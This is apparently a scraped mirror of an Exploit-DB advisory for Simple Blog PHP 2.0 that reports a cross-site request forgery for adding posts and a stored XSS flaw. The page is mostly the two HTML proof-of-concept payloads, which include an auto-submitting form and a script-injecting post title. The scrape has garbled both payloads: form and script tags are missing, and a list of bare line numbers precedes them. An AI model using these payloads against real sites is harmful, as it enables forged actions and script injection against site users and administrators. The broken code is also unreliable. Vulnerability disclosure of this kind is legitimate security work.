Simple Blog PHP 2.0 – Multiple Vulnerabilities - 体验盒子

作者： Ehsan Hosseini

日期： 2016-10-13

类别：

webapps

平台：

php

来源：https://www.exploit-db.com/exploits/40518/

1

2

3

4

5

6

7

8

9

10

11

12

13

14

15

16

17

18

19

20

21

22

23

24

25

26

27

28

29

30

31

32

33

34

35

36

37

38

39

40

41

42

43

44

45

46

47

48

49

50

51

=====================================================

# Simple Blog PHP 2.0 - CSRF(Add Post) // Stored XSS

=====================================================

# Vendor Homepage: http://simpleblogphp.com/

# Date: 13 Oct 2016

# Demo Link : http://simpleblogphp.com/blog/admin.php

# Version : 2.0

# Platform : PHP

# Author: Ashiyane Digital Security Team

# Contact: hehsan979@gmail.com

=====================================================

# CSRF PoC(Add Post):

<html>

<body>

</form>

document.forms[0].submit();

</script>

</body>

</html>

# Stored XSS PoC:

<html>

<body>

<input type="hidden" name="post_title" value="<script>alert('XssPoC')</script>" />

</form>

document.forms[0].submit();

</script>

</body>

</html>

================================================================================

# Discovered By : Ehsan Hosseini

================================================================================